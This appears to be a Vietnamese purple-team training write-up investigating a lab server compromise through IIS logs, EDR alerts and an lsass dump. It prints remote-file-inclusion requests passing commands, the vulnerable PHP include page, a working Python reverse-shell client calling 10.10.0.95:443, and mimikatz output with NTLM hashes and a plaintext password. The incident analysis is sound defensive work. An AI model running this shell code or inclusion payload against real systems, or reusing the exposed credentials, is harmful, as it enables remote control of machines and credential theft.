Purple Lab
On Job Training
Last updated
On Job Training
Last updated
Alert về việc spawn shell trên máy PL-SERVER2:
Trace lại các alert cũ, em thấy từ ngày 27/08/2024 lúc 09:27:50, bắt đầu xuất hiện các cảnh báo về việc w3wp.exe chạy php sử dụng cgi-php.exe
Các file hiện có trong server:
Tiến hành truy cập vào C:\inetpub\logs\LogFiles\W3SVC1, em lấy log các ngày lân cận có sẵn. Ở đây em thấy có các ngày 22, 27, 28, 30 tháng 8.
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-22 04:55:04
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-22 04:55:04 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 597
2024-08-22 04:55:14 192.168.30.172 GET /uploads/res.txt - 80 - 192.168.30.73 curl/7.55.1 - 200 0 0 6
2024-08-22 04:57:33 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 128
2024-08-22 04:57:34 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 38
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-22 10:19:13
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-22 10:19:13 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 507
2024-08-22 10:19:24 192.168.30.172 GET /uploads/res.txt - 80 - 192.168.30.73 curl/7.55.1 - 200 0 0 155
2024-08-22 10:20:08 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 140
2024-08-22 10:20:10 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 48
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-22 11:16:31
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-22 11:16:31 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 583
2024-08-22 11:16:42 192.168.30.172 GET /uploads/res.txt - 80 - 192.168.30.73 curl/7.55.1 - 200 0 0 5
2024-08-22 11:17:31 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 152
2024-08-22 11:17:32 192.168.30.172 POST /hello.aspx - 80 - 192.168.30.73 curl/8.5.0 - 500 0 0 43
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-27 02:22:12
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-27 02:22:12 ::1 GET /index.php - 80 - ::1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 - 200 0 0 290
2024-08-27 02:22:12 ::1 GET /favicon.ico - 80 - ::1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 http://localhost/index.php 404 0 2 22
2024-08-27 02:24:47 10.10.0.92 GET /vul - 80 - 10.10.0.92 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 - 404 0 2 339
2024-08-27 02:24:47 10.10.0.92 GET /favicon.ico - 80 - 10.10.0.92 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 http://10.10.0.92/vul 404 0 2 1
2024-08-27 02:24:51 10.10.0.92 GET /vul.php - 80 - 10.10.0.92 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 - 200 0 0 9
2024-08-27 02:26:18 10.10.0.92 GET /favicon.ico - 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 http://10.10.0.92/vul.php 404 0 2 33
2024-08-27 02:26:32 10.10.0.92 GET /vul.php - 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 9
2024-08-27 02:26:44 10.10.0.92 GET /vul.php page=hello 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 8
2024-08-27 02:28:32 10.10.0.92 GET /vul.php page=hello 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 14
2024-08-27 02:28:51 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=ipconfig 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 239
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-27 03:08:06
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-27 03:08:06 10.10.0.92 GET /vul.php - 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 247
2024-08-27 03:08:41 10.10.0.92 GET /vul.php - 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 5
2024-08-27 03:09:51 10.10.0.92 GET /vul.php - 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 16
2024-08-27 03:16:14 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=id 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 307
2024-08-27 03:16:24 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=whoami 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 195
2024-08-27 03:19:33 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=whoami 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 261
2024-08-27 03:20:49 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=ipconfig /all 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 208
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-27 04:10:49
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-27 04:10:49 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=tasklist 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 766
2024-08-27 04:11:33 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=tasklist -svc 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 432
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-27 08:14:59
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-27 08:14:59 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\main.exe C:\Windows\temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 732
2024-08-27 08:16:19 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\client_operations.py C:\Windows\temp\client_operations.py 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 278
2024-08-27 08:17:31 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\client_connection.py C:\Windows\temp\client_connection.py 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 279
2024-08-27 08:22:33 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd.exe -c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 76895
2024-08-27 08:25:46 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 105026#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-28 03:32:21
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-28 03:32:21 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 472
2024-08-28 03:33:32 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 213
2024-08-28 03:33:54 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=ipconfig 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 192
2024-08-28 03:34:25 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 232
2024-08-28 03:36:00 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\client_connection.py C:\Windows\temp\client_connection.py 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 329
2024-08-28 03:36:11 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 213
2024-08-28 03:37:41 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\main.exe C:\Windows\temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 501
2024-08-28 03:39:21 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 96192
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-28 03:54:49
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-28 03:54:49 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 105027
2024-08-28 04:02:54 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 39638
2024-08-28 04:03:40 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 39539
2024-08-28 04:05:09 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 84633
2024-08-28 04:06:57 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 1751
2024-08-28 04:09:15 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 73315
2024-08-28 04:14:10 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 64 105014
2024-08-28 04:16:09 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 105012
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-28 04:38:13
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-28 04:38:13 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 447
2024-08-28 04:38:30 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 177
2024-08-28 04:47:23 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 296
2024-08-28 04:48:52 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\main.exe C:\Windows\temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 504
2024-08-28 04:49:00 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\client_operations.py C:\Windows\temp\client_operations.py 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 294
2024-08-28 04:49:08 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=copy \\10.10.0.95\share\client_connection.py C:\Windows\temp\client_connection.py 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 262
2024-08-28 04:50:53 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 89502
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-28 06:56:35
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-28 06:56:35 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 9998
2024-08-28 06:59:01 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 80059
2024-08-28 07:01:05 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 74547
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-28 07:17:52
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-28 07:17:52 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 10969
2024-08-28 07:19:03 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 42691
2024-08-28 07:19:27 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 21084
2024-08-28 07:22:34 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 44347
2024-08-28 07:23:55 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 64363
2024-08-28 07:25:51 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 93764
2024-08-28 07:31:17 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 200 0 0 6051
2024-08-28 07:32:56 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 77433
2024-08-28 07:40:00 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 105021
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-28 10:00:33
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-28 10:00:33 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 105179
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-08-30 07:19:37
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-08-30 07:19:37 10.10.0.92 GET /vul.php page=\\10.10.0.95\share\shell.txt&cmd=cmd /c C:\Windows\Temp\main.exe 80 - 10.10.0.95 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - 500 0 258 105199Có thể thấy IP của attacker là 10.10.0.92, nhưng nó lại gọi tới một file shell.txt ở IP 10.10.0.95.
Hiện tại thì em vẫn chưa tìm ra file vul.php tồn tại bằng cách nào.
Đây là nội dung của nó.
<?php
// vulnerable_page.php
// Check if the 'page' parameter is set in the URL
if (isset($_GET['page'])) {
$page = $_GET['page'];
// Vulnerable to file inclusion
include($page);
} else {
echo "Welcome to the vulnerable page. Use the 'page' parameter to include a file.";
}
?>Dựa trên log thì sau một hồi recon, hacker đã upfile main.exe cùng vơi 2 file sau lên
client_connection.py
def connect_to_server(socket, handle_upload, handle_download, execute_command, subprocess, os):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("10.10.0.95", 443))
while True:
command = client.recv(4096).decode()
if command.lower() == "exit":
client.close()
break
if command.startswith("upload"):
handle_upload(command, client)
elif command.startswith("download"):
handle_download(command, client, os)
else:
execute_command(command, client, subprocess)
client_operations.py
def handle_upload(command, client):
_, filename = command.split(" ")
with open(filename, "wb") as f:
data = client.recv(4096)
f.write(data)
print("File uploaded.")
def handle_download(command, client, os):
filepath = command.split(" ")[1]
if os.path.exists(filepath):
with open(filepath, "rb") as f:
client.send(f.read())
else:
client.send(b"File not found.")
def execute_command(command, client, subprocess):
output = subprocess.getoutput(command)
client.send(output.encode())
VRTT của main.exe: https://www.virustotal.com/gui/file/b98e4403f3bfc66481179770eb4c7d5e55545e2ed1f7982d2d8bb163e878959c/relations
File main.exe khi chạy có kết nối TCP tới IP 10.10.0.95:https. Có thể đoán đây là reverse shell.
Dựa trên http log và alert của EDR, có thể thấy sau 11:15:51, các lệnh sẽ được chạy bằng reverse shell main.exe nên ta sẽ để ý log trên SIEM và EDR nhiều hơn
Hacker vẫn tiến hành hành vi discovery như netstat, tasklist, ipconfig. Sau đó, em đã thấy được hành vi cố gắng lateral movement sử dụng PsExec và ProcDump để lấy cre.
IP được hướng đến là của AD
Thử vào thì thấy file dmp vẫn còn trên server, sau khi tải về và đọc bằng mimikatz ta thấy được những gì hacker đã có
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # dir
ERROR mimikatz_doLocal ; "dir" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz # ls
ERROR mimikatz_doLocal ; "ls" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz # log lsass.txt
Using 'lsass.txt' for logfile : OK
mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...
Authentication Id : 0 ; 596451238 (00000000:238d1fa6)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/21/2024 11:15:47 AM
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : PL-SERVER2$
* Domain : testlab.local
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 8/7/2024 5:58:37 PM
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 1042716341 (00000000:3e2696b5)
Session : RemoteInteractive from 4
User Name : dev
Domain : TESTLAB
Logon Server : AD
Logon Time : 8/28/2024 5:10:23 PM
SID : S-1-5-21-2645767256-3101023073-3015972391-1279
msv :
[00000003] Primary
* Username : dev
* Domain : TESTLAB
* NTLM : ea9fdbf576676540876a8c69c3af0965
* SHA1 : be407408759849b951f5490d7012d27336ba8f50
* DPAPI : 9869f7fcb993a0337cefec9b21a0fdfa
tspkg :
wdigest :
* Username : dev
* Domain : TESTLAB
* Password : VMT3st#123
kerberos :
* Username : dev
* Domain : TESTLAB.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 1042707356 (00000000:3e26739c)
Session : Interactive from 4
User Name : DWM-4
Domain : Window Manager
Logon Server : (null)
